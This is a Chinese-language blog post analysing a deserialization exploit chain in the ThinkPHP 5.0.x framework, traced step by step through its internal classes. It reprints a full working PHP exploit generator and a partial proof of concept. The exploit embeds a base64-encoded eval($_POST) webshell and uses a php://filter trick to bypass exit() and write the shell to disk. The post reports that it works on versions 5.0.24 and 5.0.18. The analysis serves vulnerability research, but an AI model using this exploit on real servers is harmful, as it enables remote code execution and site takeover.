Thinkphp5.0.x反序列化利用链分析

Grav1ty

原文链接：Thinkphp5.0.x反序列化利用链分析

漏洞复现

exp

1. <?php
   
2. 
   
3. //__destruct
   
4. namespace think\process\pipes{
   
5.     class Windows{
   
6.         private $files=[];
   
7. 
   
8.         public function __construct($pivot)
   
9.         {
   
10.             $this->files[]=$pivot; //传入Pivot类
    
11.         }
    
12.     }
    
13. }
    
14. 
    
15. //__toString Model子类
    
16. namespace think\model{
    
17.     class Pivot{
    
18.         protected $parent;
    
19.         protected $append = [];
    
20.         protected $error;
    
21. 
    
22.         public function __construct($output,$hasone)
    
23.         {
    
24.             $this->parent=$output; //$this->parent等于Output类
    
25.             $this->append=['a'=>'getError'];
    
26.             $this->error=$hasone;   //$modelRelation=$this->error
    
27.         }
    
28.     }
    
29. }
    
30. 
    
31. //getModel
    
32. namespace think\db{
    
33.     class Query
    
34.     {
    
35.         protected $model;
    
36. 
    
37.         public function __construct($output)
    
38.         {
    
39.             $this->model=$output; //get_class($modelRelation->getModel()) == get_class($this->parent)
    
40.         }
    
41.     }
    
42. }
    
43. 
    
44. namespace think\console{
    
45.     class Output
    
46.     {
    
47.         private $handle = null;
    
48.         protected $styles;
    
49.         public function __construct($memcached)
    
50.         {
    
51.             $this->handle=$memcached;
    
52.             $this->styles=['getAttr'];
    
53.         }
    
54.     }
    
55. }
    
56. 
    
57. //Relation
    
58. namespace think\model\relation{
    
59.     class HasOne{
    
60.         protected $query;
    
61.         protected $selfRelation;
    
62.         protected $bindAttr = [];
    
63. 
    
64.         public function __construct($query)
    
65.         {
    
66.             $this->query=$query; //调用Query类的getModel
    
67. 
    
68.             $this->selfRelation=false; //满足条件!$modelRelation->isSelfRelation()
    
69.             $this->bindAttr=['a'=>'admin'];  //控制__call的参数$attr
    
70.         }
    
71.     }
    
72. }
    
73. 
    
74. namespace think\session\driver{
    
75.     class Memcached{
    
76.         protected $handler = null;
    
77. 
    
78.         public function __construct($file)
    
79.         {
    
80.             $this->handler=$file; //$this->handler等于File类
    
81.         }
    
82.     }
    
83. }
    
84. 
    
85. namespace think\cache\driver{
    
86.     class File{
    
87.         protected $options = [
    
88.             'path'=> 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
    
89.             'cache_subdir'=>false,
    
90.             'prefix'=>'',
    
91.             'data_compress'=>false
    
92.         ];
    
93.         protected $tag=true;
    
94. 
    
95. 
    
96.     }
    
97. }
    
98. 
    
99. namespace {
    
100.     $file=new think\cache\driver\File();
     
101.     $memcached=new think\session\driver\Memcached($file);
     
102.     $output=new think\console\Output($memcached);
     
103.     $query=new think\db\Query($output);
     
104.     $hasone=new think\model\relation\HasOne($query);
     
105.     $pivot=new think\model\Pivot($output,$hasone);
     
106.     $windows=new think\process\pipes\Windows($pivot);
     
107. 
     
108.     echo urlencode(serialize($windows));
     
109. }

复制代码

写入成功

1. http://localhost/public/a.php3b58a9545013e88c7186db11bb158c44.php

复制代码

文件内容

利用链分析

• thinkphp/library/think/process/pipes/Windows.php __destruct 调用removeFiles
• removeFiles，调用file_exists触发__toString
• thinkphp/library/think/Model.php tostring->toJson->toArray 最终调用`call`
• thinkphp/library/think/console/Output.php __call 调用Output类的block
• thinkphp/library/think/console/Output.php block调用writeIn->write，最后调用$this->handle->write()，全局搜索write方法
• thinkphp/library/think/session/driver/Memcached.php write方法调用$this->handle->set()，全局搜索set
• thinkphp/library/think/cache/driver/File.php set调用file_put_contents写入文件，但是参数不可控，继续进入setTagItem
• setTagItem再次调用set，此时参数可控，写入webshell
  
  

1.thinkphp/library/think/process/pipes/Windows.php

起点：__destruct

调用removeFiles方法

2.thinkphp/library/think/process/pipes/Windows.php

removeFiles中调用了file_exists，触发__toString

3.thinkphp/library/think/Model.php

__toString->toJson->toArray：

执行到$item[$key] = $value ? $value->getAttr($attr) : null;就能够执行Output类__call魔术方法

需要让$value等于Output类

需要满足条件进入else分支

• $this->append不为空
• $bindAttr
  
  

$value是包含__call方法的类，也就是Output类，$attr是传入的参数。来看一下$value和$attr的来源

$value变量来源

$value的赋值过程

1. $modelRelation = $this->$relation();
   
2. $value         = $this->getRelationData($modelRelation);

复制代码

让$relation等于Model类的getError()，这样$modelRelation就等于$this->error，$modelRelation可控

进入getRelationData，传入的$modelRelation必须是Relation类型，全局搜索找到符合要求的类HasOne

需要满足三个条件进入if分支，才能使$value可控，等于$this->parent

1. $this->parent && !$modelRelation->isSelfRelation() && get_class($modelRelation->getModel()) == get_class($this->parent)

复制代码

第一个条件：$this->parent就是$value的来源，等于Output类

来看一下如何满足第二个条件

1. !$modelRelation->isSelfRelation()

复制代码

HasOne类是OneToOne类的子类，同样继承了Relation

/thinkphp/library/think/model/Relation.php

isSelfRelation方法，需要让$this->selfRelation为false

第三个条件，需要让$modelRelation->getModel()返回Output类

1. get_class($modelRelation->getModel()) == get_class($this->parent)

复制代码

/thinkphp/library/think/model/Relation.php

Relation的getModel方法可以调用任意类的getModel方法，全局搜索getModel()

$attr的来源

$modelRelation必须是一个有getBindAttr方法且bindAttr属性可控的类，全局搜索存在getBindAttr方法的类

/thinkphp/library/think/model/relation/OneToOne.php

找到符合要求的类OneToOne，上面已经用了它的子类HasOne，所以直接改HasOne的bindAttr属性就行

先构造部分poc，目的是成功调用到Output类的__call

1. <?php
   
2. 
   
3. //__destruct
   
4. namespace think\process\pipes{
   
5.     class Windows{
   
6.         private $files=[];
   
7. 
   
8.         public function __construct($pivot)
   
9.         {
   
10.             $this->files[]=$pivot; //传入Pivot类
    
11.         }
    
12.     }
    
13. }
    
14. 
    
15. //__toString Pivot是Model子类
    
16. namespace think\model{
    
17.     class Pivot{
    
18.         protected $parent;
    
19.         protected $append = [];
    
20.         protected $error;
    
21. 
    
22.         public function __construct($output,$hasone)
    
23.         {
    
24.             $this->parent=$output; //$this->parent等于Output类
    
25.             $this->append=['a'=>'getError'];
    
26.             $this->error=$hasone;   //$modelRelation=$this->error=Hasone类
    
27.         }
    
28.     }
    
29. }
    
30. 
    
31. //getModel
    
32. namespace think\db{
    
33.     class Query
    
34.     {
    
35.         protected $model;
    
36. 
    
37.         public function __construct($output)
    
38.         {
    
39.             $this->model=$output; //$modelRelation->getModel()等于Output类
    
40.         }
    
41.     }
    
42. }
    
43. 
    
44. //__call
    
45. namespace think\console{
    
46.     class Output
    
47.     {
    
48.         public function __construct()
    
49.         {
    
50. 
    
51.         }
    
52.     }
    
53. }
    
54. 
    
55. //HasOne类继承自Relation
    
56. namespace think\model\relation{
    
57.     class HasOne{
    
58.         protected $query;
    
59.         protected $selfRelation;
    
60.         protected $bindAttr = [];
    
61. 
    
62.         public function __construct($query)
    
63.         {
    
64.             $this->query=$query; //调用Query类的getModel
    
65. 
    
66.             $this->selfRelation=false; //满足条件!$modelRelation->isSelfRelation()
    
67.             $this->bindAttr=['a'=>'a'];  //控制__call的参数$attr
    
68.         }
    
69.     }
    
70. }
    
71. 
    
72. namespace {
    
73.     $output=new think\console\Output();
    
74. 
    
75.     $query=new think\db\Query($output);
    
76. 
    
77.     $hasone=new think\model\relation\HasOne($query);
    
78.     $pivot=new think\model\Pivot($output,$hasone);
    
79.     $windows=new think\process\pipes\Windows($pivot);
    
80. 
    
81.     echo urlencode(serialize($windows));
    
82. }

复制代码

成功调用了Output类的__call

4./thinkphp/library/think/console/Output.php

Output类的__call，调用block方法

5./thinkphp/library/think/console/Output.php

Output类的block方法调用了writeIn，$message就是HasOne类的属性bindAttr数组的值，是可控的。格式如下

1. <getAttr>admin</getAttr>

复制代码

6./thinkphp/library/think/console/Output.php

Output类的writeIn方法调用了write方法，$this->handle可控，可以调用任意类的write方法。全局搜索write方法

7.thinkphp/library/think/session/driver/Memcached.php

找到Memcached类的write方法，可以调用任意类的set方法，全局搜索set方法

8.thinkphp/library/think/cache/driver/File.php

最后找到File类，set方法中可以调用file_put_contents方法写入shell。

第一个参数$name是从block方法那里传入的，还是

1. <getAttr>admin</getAttr>

复制代码

第二个参数$value固定为false

文件名$filename来源于getCacheKey，实际上等于

1. $filename = $this->options['path'] . md5($name) . '.php';

复制代码

也就是

1. $filename = $this->options['path'] . md5('<getAttr>admin</getAttr>') . '.php';

复制代码

可以通过$this->options['path']控制文件名

还有个问题，文件内容不可控。

$data来自于set方法的参数$value，而$value的值固定为true，而且$expire只能为数值，

9.thinkphp/library/think/cache/driver/File.php

继续执行进入setTagItem，再次调用set，两个参数都可控了

现在第一个参数$name等于

1. 'tag_' . md5($this->tag);

复制代码

$value就是上面的$filename

1. $value=php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php63ac11a7699c5c57d85009296440d77a.php

复制代码

利用php://filter的convert.iconv和convret.base64-decode绕过拼接的exit()，写入webshell

原理见：https://xz.aliyun.com/t/7457

一共会写入两个文件，第一个文件内容不可控，第二个才是webshell

1. a.php3b58a9545013e88c7186db11bb158c44.php

复制代码

总结

实际测试在5.0.24和5.0.18可用，5.0.9不可用

要点：

• Model类的__toString调用Output类的__call的条件
• 二次调用set实现内容可控
• 用过滤器绕过文件名和exit()
  
  

借用文章里的图总结一下